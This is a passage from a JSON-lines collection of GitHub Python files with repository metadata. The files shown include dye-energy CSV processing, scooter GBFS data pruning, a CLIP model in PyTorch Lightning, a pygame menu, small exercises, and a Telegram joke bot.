'9ed_30b_7ea', '9ed_33b_11ea', '9ed_29b_8ea', '2ed_30b_5ea', '9ed_30b_11ea', '9ed_30b_2ea', '2ed_30b_1ea', '2ed_36b_5ea', '2ed_30b_4ea', '2ed_30b_8ea']\n# ignore = ['9ed_32b_8ea', '10ed_35b_5ea', '2ed_35b_3ea', '10ed_33b_4ea', '2ed_8b_4ea', '2ed_30b_6ea', '2ed_35b_8ea', '2ed_35b_11ea', '2ed_34b_8ea', '9ed_1b_3ea', '2ed_35b_10ea', '2ed_34b_7ea', '2ed_35b_7ea', '10ed_16b_2ea', '9ed_34b_2ea', '2ed_35b_5ea', '2ed_35b_1ea', '9ed_33b_4ea', '2ed_34b_5ea', '2ed_31b_7ea', '2ed_30b_7ea', '11ed_10b_9ea', '2ed_34b_6ea', '2ed_31b_1ea', '9ed_31b_1ea', '2ed_31b_9ea', '2ed_35b_9ea', '9ed_33b_1ea', '9ed_35b_10ea', '2ed_34b_2ea', '2ed_35b_4ea', '9ed_34b_11ea', '2ed_31b_10ea', '1ed_8b_9ea', '2ed_34b_3ea', '2ed_34b_11ea']\n ignore 
= ['9ed_32b_8ea', '10ed_35b_5ea', '2ed_35b_3ea', '10ed_33b_4ea', '2ed_8b_4ea', '2ed_30b_6ea', '2ed_35b_8ea', '2ed_35b_11ea', '2ed_34b_8ea', '9ed_1b_3ea', '2ed_35b_10ea', '2ed_34b_7ea', '2ed_35b_7ea', '10ed_16b_2ea', '9ed_34b_2ea', '2ed_35b_5ea', '2ed_35b_1ea', '9ed_33b_4ea', '2ed_34b_5ea', '2ed_31b_7ea', '2ed_30b_7ea', '11ed_10b_9ea', '2ed_34b_6ea', '2ed_31b_1ea', '9ed_31b_1ea', '2ed_31b_9ea', '2ed_35b_9ea', '9ed_33b_1ea', '9ed_35b_10ea', '2ed_34b_2ea', '2ed_35b_4ea', '9ed_34b_11ea', '2ed_31b_10ea', '1ed_8b_9ea', '2ed_34b_3ea', '2ed_34b_11ea']\n names_2 = []\n for name in names:\n if name in ignore:\n print(name)\n else:\n names_2.append(name)\n \n \n for name in names_2:\n try:\n \n ll = df_2.loc[df_2['Name'] == name]\n # print(ll)\n a = ll['HOMO Donor'].to_string()\n # print(a)\n a = str(a[4:])\n df['HOMO Donor'].append(a)\n\n b = ll['LUMO Donor'].to_string() \n b = str(b[4:])\n df['LUMO Donor'].append(b)\n \n\n c = ll['HOMO Backbone'].to_string() \n c = str(c[4:])\n df['HOMO Backbone'].append(c)\n \n\n d = ll['LUMO Backbone'].to_string() \n d = str(d[4:])\n df['LUMO Backbone'].append(d)\n \n\n e = ll['HOMO Acceptor'].to_string() \n e = str(e[4:])\n df['HOMO Acceptor'].append(e)\n \n\n h = ll['LUMO Acceptor'].to_string() \n print(h)\n h = str(h[4:])\n df['LUMO Acceptor'].append(h)\n \n\n i = ll['HOMO Anchor'].to_string() \n i = str(i[4:])\n df['HOMO Anchor'].append(i)\n \n\n k = ll['LUMO Anchor'].to_string() \n k = str(k[4:])\n df['LUMO Anchor'].append(k)\n \n\n \n df['name'].append(name)\n df['wave'].append(new_dict[name][0])\n df['lumo'].append(new_dict[name][1])\n # df['lumo'].append(new_dict[name][2])\n df['homo'].append(new_dict[name][2])\n # df['homo'].append(new_dict[name][1])\n except KeyError:\n df['name'].append(name)\n df['HOMO Donor'].append('Key Error')\n df['LUMO Donor'].append('Key Error')\n df['HOMO Backbone'].append('Key Error')\n df['LUMO Backbone'].append('Key Error')\n df['HOMO Acceptor'].append('Key Error')\n df['LUMO Acceptor'].append('Key Error')\n df['HOMO Anchor'].append('Key Error')\n df['LUMO Anchor'].append('Key Error')\n df['wave'].append('Key Error')\n df['lumo'].append('Key Error')\n df['homo'].append('Key Error')\n error.append(name)\n print('Dyes with key error')\n print(error)\n print(len(error))\n df = pd.DataFrame(df)\n print(df)\n # print(name)\n \n # wave.append(new_dict[name][0])\n # lumo.append(new_dict[name][1])\n # homo.append(new_dict[name][2])\n \n \n #df['LUMO Energy']=lumo\n #df['HOMO Energy']=homo\n #df['Wave']=wave\n df.to_csv('../data_analysis/%s.csv' % output,index=False)\n \n # print(df)\n \n \n \n\n\n return df\n\n\n\ndef main():\n # filename = '../data_analysis/percentages_800to1000.csv'\n # namer = '../data_analysis/names_for_paper_800_to_1000.csv'\n # filename = '../data_analysis/names_for_paper_600_to_800.csv'\n namer = '../data_analysis/names_for_paper_600_to_800.csv'\n namer = '../data_analysis/600_final_before_scoring.csv'\n # filename = '../data_analysis/fin_800.csv'\n filename = '../data_analysis/percentages.csv'\n# filename = '../data_analysis/test.csv'\n\n json_file = '../json_files/ds_all5_out.json'\n# output_file = '../data_analysis/800_final_before_scoring'\n output_file = '../data_analysis/600_all_before_scoring'\n\n names = csv_names(filename)\n # names = csv_names(namer)\n print(len(names))\n red = json_reader(json_file)\n print(red)\n df_adder(filename,names,red,output_file)\n\n\n\n\n # dataframe_editor(filename,json_file)\n\n 
return\nmain()\n","repo_name":"Awallace3/Dyes","sub_path":"src/percentage_csv_editor.py","file_name":"percentage_csv_editor.py","file_ext":"py","file_size_in_byte":7745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"71003162245","text":"import os, json, csv\nfrom haversine import haversine, Unit\n\n#Overall the thought is that we'd append to a few(?) CSVs the data from \"data\" folder.\n#Then afterwards it could be deleted\n\n#We'll only do \"free_bike_status\" since it's our only High Freq (other than \"dc\")\n#Also starting on just \"austin_scooter_jump_system\"\n\ndef convertBikeListToDict(prevJson, curJson, nextJson):\n prevDict, curDict, nextDict = {}, {}, {}\n\n keysToPull = [\"lat\", \"lon\", \"is_reserved\", \"is_disabled\", \"jump_vehicle_type\", \"jump_ebike_battery_level\", \"jump_vehicle_name\"]\n\n for rtnDict, bikeList in zip([prevDict, curDict, nextDict], [prevJson, curJson, nextJson]):\n for bike in bikeList:\n rtnDict[bike['bike_id']] = {}\n for k in keysToPull:\n rtnDict[bike['bike_id']][k] = bike[k]\n\n return prevDict, curDict, nextDict\n\ndef hasAnyChange(prevBikeData, curBikeData, nextBikeData):\n rtn = False\n for k in curBikeData:\n if prevBikeData[k] == curBikeData[k] == nextBikeData[k]:\n pass\n else:\n rtn = True\n break\n\n return rtn\n\ndef main():\n projectFolder = \"austin_scooter_jump_system\"\n dataFolder = \"free_bike_status\"\n\n fileList = [\"data/\"+projectFolder+\"/\"+dataFolder+\"/\"+f for f in os.listdir(os.curdir+\"/data/\"+projectFolder+\"/\"+dataFolder)]\n fileList.sort()\n\n outputWriter = csv.writer(open(projectFolder+\"__\"+dataFolder+\".csv\", \"wt\"), lineterminator='\\n')\n outputHeader = [\"bike_id\", \"lat\", \"lon\", \"is_reserved\", \"is_disabled\", \\\n \"jump_vehicle_type\", \"jump_ebike_battery_level\", \"jump_vehicle_name\", \\\n \"prev_lat\", \"prev_lon\", \"prev_jump_ebike_battery_level\", \"next_lat\", \\\n \"next_lon\", \"next_jump_ebike_battery_level\", \"prev_haversine\", \"next_haversine\", \\\n \"prev_timestamp\", \"cur_timestamp\", \"next_timestamp\"]\n\n outputWriter.writerow(outputHeader)\n\n for curIdx in range(1, len(fileList)-1):\n print(curIdx)\n prevIdx = curIdx-1\n nextIdx = curIdx+1\n\n prevJson = json.load(open(fileList[prevIdx], 'rt'))['data']['bikes']\n curJson = json.load(open(fileList[curIdx], 'rt'))['data']['bikes']\n nextJson = json.load(open(fileList[nextIdx], 'rt'))['data']['bikes']\n\n prevDict, curDict, nextDict = convertBikeListToDict(prevJson, curJson, nextJson)\n\n for bikeId, curBikeData in curDict.items():\n #try:\n # if not hasAnyChange(prevDict[bikeId], curBikeData, nextDict[bikeId]):\n # continue\n #except(KeyError):\n # pass\n oRow = [bikeId]\n for oHeader in outputHeader[1:8]:\n oRow.append(curBikeData[oHeader])\n\n try:\n oRow.append(prevDict[bikeId]['lat'])\n oRow.append(prevDict[bikeId]['lon'])\n oRow.append(prevDict[bikeId]['jump_ebike_battery_level'])\n except(KeyError):\n oRow.extend(['', '', ''])\n\n try:\n oRow.append(nextDict[bikeId]['lat'])\n oRow.append(nextDict[bikeId]['lon'])\n oRow.append(nextDict[bikeId]['jump_ebike_battery_level'])\n except(KeyError):\n oRow.extend(['', '', ''])\n\n\n curPoint = (curBikeData['lat'], curBikeData['lon'])\n\n try:\n prevPoint = (prevDict[bikeId]['lat'], prevDict[bikeId]['lon'])\n oRow.append(haversine(prevPoint, curPoint, unit=Unit.MILES))\n except(KeyError):\n oRow.append(\"\")\n\n try:\n nextPoint = (nextDict[bikeId]['lat'], nextDict[bikeId]['lon'])\n oRow.append(haversine(curPoint, 
nextPoint, unit=Unit.MILES))\n except(KeyError):\n oRow.append(\"\")\n\n startFilterIdx = len(projectFolder)+len(dataFolder)+len(\"data/\")+2\n\n oRow.extend([fileList[prevIdx][startFilterIdx:-5], fileList[curIdx][startFilterIdx:-5], fileList[nextIdx][startFilterIdx:-5]])\n\n outputWriter.writerow(oRow)\n\nmain()\n","repo_name":"hoopskin/GBFS-Scraping","sub_path":"pruneDataFiles.py","file_name":"pruneDataFiles.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10099510776","text":"from django.conf.urls.defaults import *\nfrom django.conf import settings\nimport views\n\nimport dselector\nparser = dselector.Parser()\nurl = parser.url\n\nurlpatterns = parser.patterns('', \n url(r'$', views.search, name='search'),\n url(r'search-results$', views.search_results, name='search_results'),\n url(r'spreadsheet/{spreadsheet_id:digits}$', views.spreadsheet, name='spreadsheet'),\n url(r'spreadsheet/queue_generation$', views.queue_generation, name='queue_generation'),\n url(r'spreadsheet/{spreadsheet_id:digits}/save-basic$', views.save_basic_info, name='save_basic_info'),\n url(r'spreadsheet/delete$', views.delete, name='delete'),\n url(r'spreadsheet/{spreadsheet_id:digits}/email-list$', views.email_list, name='email_list'),\n url(r'spreadsheet/group-count$', views.group_count, name='group_count'),\n\n url(r'new$', views.new, name='new_spreadsheet'),\n \n \n)","repo_name":"skoczen/mycelium","sub_path":"mycelium/apps/spreadsheets/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"36033768536","text":"from typing import Any, Optional\nfrom pytorch_lightning.utilities.types import STEP_OUTPUT\nimport timm\nfrom transformers import DistilBertModel, DistilBertConfig, DistilBertTokenizer\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom config import CFG\nimport pytorch_lightning as pl\nimport itertools\n\nclass ImageEncoder(nn.Module):\n \"\"\"\n Encode images to a fixed size vector\n \"\"\"\n\n def __init__(\n self, model_name=CFG.model_name, pretrained=CFG.pretrained, trainable=CFG.trainable\n ):\n super().__init__()\n self.model = timm.create_model(\n model_name, pretrained, num_classes=0, global_pool=\"avg\"\n )\n for p in self.model.parameters():\n p.requires_grad = trainable\n\n def forward(self, x):\n return self.model(x)\n \nclass TextEncoder(nn.Module):\n def __init__(self, model_name=CFG.text_encoder_model, pretrained=CFG.pretrained, trainable=CFG.trainable):\n super().__init__()\n if pretrained:\n self.model = DistilBertModel.from_pretrained(model_name)\n else:\n self.model = DistilBertModel(config=DistilBertConfig())\n \n for p in self.model.parameters():\n p.requires_grad = trainable\n\n # we are using the CLS token hidden representation as the sentence's embedding\n self.target_token_idx = 0\n\n def forward(self, input_ids, attention_mask):\n output = self.model(input_ids=input_ids, attention_mask=attention_mask)\n last_hidden_state = output.last_hidden_state\n return last_hidden_state[:, self.target_token_idx, :]\n \nclass ProjectionHead(nn.Module):\n def __init__(\n self,\n embedding_dim,\n projection_dim=CFG.projection_dim,\n dropout=CFG.dropout\n ):\n super().__init__()\n self.projection = nn.Linear(embedding_dim, projection_dim)\n self.gelu = nn.GELU()\n self.fc = nn.Linear(projection_dim, projection_dim)\n self.dropout = 
nn.Dropout(dropout)\n self.layer_norm = nn.LayerNorm(projection_dim)\n \n def forward(self, x):\n projected = self.projection(x)\n x = self.gelu(projected)\n x = self.fc(x)\n x = self.dropout(x)\n x = x + projected\n x = self.layer_norm(x)\n return x\n\ndef cross_entropy(preds, targets, reduction='none'):\n log_softmax = nn.LogSoftmax(dim=-1)\n loss = (-targets * log_softmax(preds)).sum(1)\n if reduction == \"none\":\n return loss\n elif reduction == \"mean\":\n return loss.mean()\n\nclass CLIPModel(pl.LightningModule):\n\n def __init__(self,temperature=CFG.temperature,\n image_embedding=CFG.image_embedding,\n text_embedding=CFG.text_embedding) -> None:\n super().__init__()\n\n self.image_encoder = ImageEncoder()\n self.text_encoder = TextEncoder()\n self.image_projection = ProjectionHead(embedding_dim=image_embedding)\n self.text_projection = ProjectionHead(embedding_dim=text_embedding)\n self.temperature = temperature\n\n self.train_losses = []\n self.val_losses = []\n\n self.params = [\n {\"params\": self.image_encoder.parameters(), \"lr\": CFG.image_encoder_lr},\n {\"params\": self.text_encoder.parameters(), \"lr\": CFG.text_encoder_lr},\n {\"params\": itertools.chain(\n self.image_projection.parameters(), self.text_projection.parameters()\n ), \"lr\": CFG.head_lr, \"weight_decay\": CFG.weight_decay}\n ]\n\n self.epoch_condition = 0\n\n def forward(self, batch):\n # Getting Image and Text Features\n image_features = self.image_encoder(batch[\"image\"])\n text_features = self.text_encoder(\n input_ids=batch[\"input_ids\"], attention_mask=batch[\"attention_mask\"]\n )\n # Getting Image and Text Embeddings (with same dimension)\n image_embeddings = self.image_projection(image_features)\n text_embeddings = self.text_projection(text_features)\n\n # Calculating the Loss\n logits = (text_embeddings @ image_embeddings.T) / self.temperature\n images_similarity = image_embeddings @ image_embeddings.T\n texts_similarity = text_embeddings @ text_embeddings.T\n targets = F.softmax(\n (images_similarity + texts_similarity) / 2 * self.temperature, dim=-1\n )\n texts_loss = cross_entropy(logits, targets, reduction='none')\n images_loss = cross_entropy(logits.T, targets.T, reduction='none')\n loss = (images_loss + texts_loss) / 2.0 # shape: (batch_size)\n return loss.mean()\n \n def training_step(self, batch, batch_idx):\n\n loss = self.forward(batch)\n\n self.log(\"train_loss\",loss,prog_bar=True)\n self.train_losses.append(loss.item())\n \n mean_loss = sum(self.train_losses) / len(self.train_losses)\n self.log(\"Mean Train Loss\", mean_loss, prog_bar=True)\n\n self.epoch_condition = 1\n\n return loss\n\n def validation_step(self, batch, batch_idx):\n \n loss = self.forward(batch)\n self.log(\"val_loss\",loss,prog_bar=True)\n self.val_losses.append(loss.item())\n\n def on_validation_epoch_end(self):\n\n if self.epoch_condition > 0:\n\n print(f\"Epoch : {self.current_epoch+1}\")\n\n train_loss_mean = sum(self.train_losses) / len(self.train_losses)\n print(f\"Training Loss : {train_loss_mean:0.4f}\")\n\n val_loss_mean = sum(self.val_losses) / len(self.val_losses)\n print(f\"Validation Loss : {val_loss_mean:0.4f}\")\n\n self.train_losses = []\n self.val_losses = []\n\n self.epoch_condition = 0\n\n if self.current_epoch+1 == self.trainer.max_epochs:\n torch.save(self.state_dict(), \"best.pt\")\n print(\"Saving Model\")\n\n def configure_optimizers(self) -> Any:\n optimizer = torch.optim.AdamW(self.params, weight_decay=0.)\n lr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, 
mode=\"min\", patience=CFG.patience, factor=CFG.factor\n )\n \n return {\n 'optimizer': optimizer,\n 'lr_scheduler': {\n 'scheduler': lr_scheduler,\n 'monitor': 'val_loss' # Monitor validation loss for reducing LR\n }\n }\n \n\n\n","repo_name":"TharunSivamani/CLIP","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"9144609192","text":"SL1_PREFIX = '10.130.153.'\nSL2_PREFIX = '10.130.154.'\nSL3_PREFIX = '10.130.155.'\nCS101_PREFIX = '10.130.152.'\nSL2_LAST_NODE = 132\nSL1_LAST_NODE = 83\nSL3_LAST_NODE = 44\nCS101_LAST_NODE = 148\nHEAD_NODE = 200\n\nSL1_IPs = [SL1_PREFIX + str(i) for i in range(1, SL1_LAST_NODE + 1)]\nSL2_IPs = [SL2_PREFIX + str(i) for i in range(1, SL2_LAST_NODE + 1)]\nSL3_IPs = [SL3_PREFIX + str(i) for i in range(1, SL3_LAST_NODE + 1)]\nCS101_IPs = [CS101_PREFIX + str(i) for i in range(1, CS101_LAST_NODE + 1)]\n\nSL1_IPs.append(SL1_PREFIX + str(HEAD_NODE))\nSL2_IPs.append(SL2_PREFIX + str(HEAD_NODE))\nSL3_IPs.append(SL3_PREFIX + str(HEAD_NODE))\nCS101_IPs.append(CS101_PREFIX + str(HEAD_NODE))\n","repo_name":"prantostic/IITB","sub_path":"CS699/Project/source/server/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"40271008148","text":"import pygame\n\nclass StartMenu:\n def __init__(self):\n self.font = pygame.font.Font(None, 36)\n self.title = self.font.render(\"Platformer title\", True, (255, 255, 255))\n self.start_option = self.font.render(\"Start Game\", True, (255, 255, 255))\n self.quit_option = self.font.render(\"Quit\", True, (255, 255, 255))\n self.selected_option = 0 # Initially select the \"Start Game\" option\n self.option_color = (255, 255, 255)\n self.selected_color = (255, 0, 0) # Color for the selected option\n\n def draw(self, screen):\n screen.fill((100, 80, 80))\n screen.blit(self.title, (200, 100))\n screen.blit(self.start_option, (300, 200))\n screen.blit(self.quit_option, (300, 250))\n\n if self.selected_option == 0:\n screen.blit(self.start_option, (300, 200))\n pygame.draw.rect(screen, self.selected_color, (295, 200, self.start_option.get_width() + 10, self.start_option.get_height()), 2)\n else:\n screen.blit(self.start_option, (300, 200))\n\n if self.selected_option == 1:\n screen.blit(self.quit_option, (300, 250))\n pygame.draw.rect(screen, self.selected_color, (295, 250, self.quit_option.get_width() + 10, self.quit_option.get_height()), 2)\n else:\n screen.blit(self.quit_option, (300, 250))\n\n def handle_input(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_DOWN:\n self.selected_option = (self.selected_option + 1) % 2\n elif event.key == pygame.K_UP:\n self.selected_option = (self.selected_option - 1) % 2\n elif event.key == pygame.K_RETURN:\n if self.selected_option == 0:\n return \"start_game\"\n elif self.selected_option == 1:\n return \"quit\"\n","repo_name":"tjmlehtinen/kodarit-stars-2023","sub_path":"menus/start_menu.py","file_name":"start_menu.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33294194554","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 13 11:11:32 2016\n\n@author: Miso\n\n\"\"\"\nbalance = 4773\nannualInterestRate = 0.2\nx=0\n\npayment = 0\nbalance_tmp = balance\nwhile balance_tmp > 0:\n payment 
+= 10\n balance_tmp = balance\n for month in range(12):\n balance_tmp = (balance_tmp-payment)*(annualInterestRate/12 + 1) \n print(balance_tmp) \n #x+=1\nprint('Lowest Payment: ' + str(payment))\n\n#monthlyPaymentRate = 0.04 \n#debt(balance, annualInterestRate, monthlyPaymentRate)\n\n","repo_name":"1337tester/python-learning","sub_path":"Courses/6_00_1_MITx Introduction to Computer Science and Programming Using Python/PS2_P2.py","file_name":"PS2_P2.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13892383925","text":"class leaf:\r\n def __init__(self,num=None):\r\n self.num=num\r\n self.left=None\r\n self.right=None\r\n def plant(self,num):\r\n if self.num:\r\n if numself.num:\r\n if self.right is None:\r\n self.right=leaf(num)\r\n else:\r\n self.right.plant(num)\r\n else:\r\n self.num=num\r\n def show(self):\r\n print(self.num,end=\"\")\r\n if self.left:\r\n print(\" \",end=\"\")\r\n self.left.show()\r\n if self.right:\r\n print(\" \",end=\"\")\r\n self.right.show()\r\ntimed=0\r\nwhile 1>0:\r\n if timed>0:\r\n print(\"\")\r\n timed=timed+1\r\n total=int(input())\r\n data=[int(x) for x in input().split()]\r\n root=leaf()\r\n for i in range(len(data)):\r\n root.plant(data[i])\r\n root.show()\r\n","repo_name":"RexChenIsAHandsomeBoy/L10","sub_path":"10-1 BST.py","file_name":"10-1 BST.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70407242886","text":"\nimport numpy as np\nimport mxnet as mx\n\nfrom classifier import DECOClassifier\nimport gcn_mxnet as gcn\n\n\nclass DECOClassifierOVA:\n \"\"\"GNN-based classifier that uses embeddings for classifying the cells in\n spreadsheets of the DECO dataset. 
It is based on several binary classifiers\n combined by a one-vs-all strategy to solve this\n mulit-class classification problem.\n \"\"\"\n\n def __init__(self, dgl_graph, features, num_labels):\n self.gnn_classifiers = self._create_classifiers(\n dgl_graph, features, num_labels)\n return\n\n def train(self, train_ids, train_labels, valid_ids, valid_labels,\n max_epochs=300, max_stagnation=50):\n \"\"\"Trains the GNN networks previously created with the create_gcn_net()\n function.\n \"\"\"\n for i, classifier in enumerate(self.gnn_classifiers):\n bin_train_labels = self._get_binary_labels(train_labels, i)\n bin_valid_labels = self._get_binary_labels(valid_labels, i)\n classifier.train(\n train_ids, bin_train_labels, valid_ids, bin_valid_labels)\n return\n\n def evaluate(self, test_ids, labels):\n \"\"\"Applies the classifier on the test set and returns\n the predition and the accuracy value.\"\"\"\n results = []\n for i, classifier in enumerate(self.gnn_classifiers):\n pred = mx.nd.softmax(classifier.net(classifier.dgl_graph))\n results.append(pred[:, 1].expand_dims(1))\n results = mx.nd.concat(*results, dim=1)\n acc = gcn.evaluate(results[test_ids], labels)\n return mx.nd.softmax(results), acc\n\n def _create_classifiers(self, dgl_graph, features, num_labels):\n weight_vector = mx.nd.array(np.ones(2)) # no class weights\n classifiers = list()\n for i in range(num_labels):\n classifiers.append(DECOClassifier(dgl_graph, features, 2, weight_vector))\n return classifiers\n\n def _get_binary_labels(self, labels, selected_label):\n \"\"\"Creates a binary label vector from a mulit-class label vector.\n \"\"\"\n return (labels == selected_label)\n","repo_name":"guenthermi/table-embeddings","sub_path":"deco_classifier/one_vs_all_classifier.py","file_name":"one_vs_all_classifier.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"99"} +{"seq_id":"13160071797","text":"#!/bin/python3\r\n\r\nfrom random import randint\r\nplayer = input('rock (r), paper (p) or scissors (s)?')\r\nprint(player, 'vs' , end=' ')\r\n\r\nchosen = randint(1,3)\r\n#print(chosen)\r\n\r\nif chosen == 1:\r\n computer = 'r'\r\n\r\nelif chosen == 2:\r\n computer = 'p'\r\n \r\nelse:\r\n computer = 's'\r\n \r\nprint(computer)\r\n\r\n#When you play what the computer has played it's a draw\r\nif player == computer:\r\n print('DRAW!')\r\n \r\n#when the player plays rock and the computer plays scissors the player wins\r\nelif player == 'r' and computer == 's':\r\n print('Player wins!')\r\n \r\nelif player == 'r' and computer == 'p':\r\n print('Computer wins!')\r\n\r\nelif player == 'p' and computer == 'r':\r\n print('Player wins!')\r\n \r\nelif player == 'p' and computer == 's':\r\n print('Computer wins!')\r\n \r\nelif player == 's' and computer == 'r':\r\n print('Computer wins!')\r\n \r\nelif player == 's' and computer == 'p':\r\n print('Player wins!')\r\n \r\nelse:\r\n print('ohohohoh')\r\n","repo_name":"Nchuijangzelie/zenia","sub_path":"rock_paper_scissors/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73032749444","text":"import logging\nimport os\n\nfrom aiogram import Bot, types\nfrom aiogram.dispatcher import Dispatcher, filters\nfrom aiogram.utils import executor\nfrom telegram.parsemode import ParseMode\n\nfrom minigame import Game, PROMPT, GAME_STATUS, PLAYER_STATUS, ALREADY_PICKED_SLOT, GAME_ENDING, 
GAME_ENDED, \\\n RESULT_ANNOUNCEMENTS, END_PHRASE\nfrom mongodb import create_user, create_game, get_top_users, get_random_anecdote, connect, voice_to_text\nfrom randomizer import *\n\nclient = connect()\ndb = client.get_database(os.environ.get('MONGO_DB_NAME'))\n\nbot = Bot(token=os.environ.get(\"API_TOKEN\"))\ndp = Dispatcher(bot)\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nmini_game = Game()\n\n\n@dp.message_handler(commands=['vtt'], commands_ignore_caption=False, content_types=types.ContentType.VOICE)\nasync def vtt(message: types.Message):\n if message.content_type():\n await voice_to_text(message, bot)\n else:\n await message.answer('Мне нужно голосовое, чтобы привести его 🤬')\n\n\n@dp.message_handler(commands=['anecdote'])\nasync def anecdote(message: types.Message):\n random_anecdote = get_random_anecdote(db, message)\n await message.answer(random_anecdote or 'Ты мне не нравишься 🤬')\n\n\n@dp.message_handler(filters.Text(contains=['анек'], ignore_case=True))\nasync def trigger(message: types.Message):\n random_anecdote = get_random_anecdote(db, message)\n await message.answer(random_anecdote or 'Ты мне не нравишься 🤬')\n\n\n@dp.message_handler(commands=['c'], commands_ignore_caption=False, content_types=types.ContentType.ANY)\nasync def test(message: types.Message):\n await message.answer(f'TESTING')\n\n\n@dp.message_handler(commands=['start'])\nasync def start(message: types.Message):\n created = create_user(db, message)\n\n if created:\n await message.reply(f'Добро пожаловать в клуб, @{message.from_user.username}')\n else:\n await message.reply(f'С тобой мы уже знакомы, @{message.from_user.username} 😅')\n\n\n@dp.message_handler(commands=['help'])\nasync def help(message: types.Message):\n await message.reply('Ну, я могу анекдот рассказать..?')\n\n\n@dp.message_handler(commands=['top'])\nasync def top(message: types.Message):\n top_users = get_top_users(db, message)\n leaderboard = '\\n'.join(\n f'{emoji:^5}{idx + 1}\\\\. 
@{user[\"username\"]:<} \\\\- {user[\"points\"]:<20}' for idx, (user, emoji) in\n enumerate(zip(top_users, get_random_emojis())))\n heading = \"*Главные любители _сомнительного_ юмора:*\"\n await message.answer(f'{heading:^}\\n\\n{leaderboard}', parse_mode=ParseMode.MARKDOWN_V2)\n\n\n@dp.message_handler(commands=['leave'])\nasync def leave(message: types.Message):\n await message.reply('🫠')\n\n\n@dp.message_handler(commands=['game'])\nasync def game(message: types.Message):\n mini_game.start_game()\n await message.answer('🫠')\n await message.answer(PROMPT, reply_markup=mini_game.get_board())\n\n\n@dp.callback_query_handler(lambda c: c.data and c.data not in [*GAME_STATUS, *PLAYER_STATUS])\nasync def process_picked_slot(callback_query: types.CallbackQuery):\n revealed_slot = mini_game.reveal(callback_query.from_user.id, callback_query.from_user.username,\n int(callback_query.data))\n if revealed_slot == ALREADY_PICKED_SLOT:\n await bot.answer_callback_query(callback_query.id, \"Одна игра - одна попытка 😉\", show_alert=True)\n else:\n await callback_query.message.edit_text(\n text=f'\\n{callback_query.message.text}\\n@{callback_query.from_user.username} {RESULT_ANNOUNCEMENTS.get(revealed_slot)}',\n reply_markup=mini_game.get_board())\n\n\n@dp.callback_query_handler(lambda c: c.data and c.data in [*GAME_STATUS, *PLAYER_STATUS])\nasync def process_game_results(callback_query: types.CallbackQuery):\n if callback_query.data == GAME_ENDING:\n game_results = mini_game.get_results()\n created = create_game(db, game_results)\n game_results_markup = mini_game.end_game()\n await callback_query.message.edit_text(\n text=f'{callback_query.message.text}\\n\\n{END_PHRASE} @{callback_query.from_user.username}',\n reply_markup=game_results_markup)\n elif callback_query.data == GAME_ENDED:\n await bot.answer_callback_query(callback_query.id, \"Эта игра уже окончена!\", show_alert=True)\n\n\nasync def setup_bot_commands(disp):\n bot_commands = [\n types.BotCommand(\"anecdote\", \"Про Вовочку, Штирлица, Петьку и Чапаева 🥸\"),\n types.BotCommand(\"start\", \"Войти в игру 😎\"),\n types.BotCommand(\"game\", \"Рубануться 💀\"),\n types.BotCommand(\"help\", \"Запросить помощь 🙏🏻\"),\n types.BotCommand(\"top\", \"Узнать настоящих ценителей 💯\"),\n types.BotCommand(\"leave\", \"Уйти с позором 🏃‍♀️💨\"),\n\n ]\n await disp.bot.set_my_commands(bot_commands)\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True, on_startup=setup_bot_commands)\n","repo_name":"ovchinnikov7/telegram_bot","sub_path":"_site/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35705658478","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas\nimport os\nimport gzip\nimport glob\nimport re\nfrom pyface.qt import QtGui, QtCore\nfrom traits.etsconfig.api import ETSConfig\nETSConfig.toolkit = 'qt4'\n\nimport matplotlib as mpl\nmpl.rcParams['backend.qt4']='PySide'\n\nmpl.use('Qt4Agg')\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom matplotlib.widgets import RectangleSelector, AxesWidget\nfrom matplotlib.ticker import FormatStrFormatter\n\nfrom traitsui.qt4.editor import Editor\nfrom traitsui.qt4.basic_editor_factory import BasicEditorFactory\nfrom traits.api import CFloat, HasTraits, Property, Instance, on_trait_change, List, Button, Float, Str\nfrom traitsui.api import View, Item, 
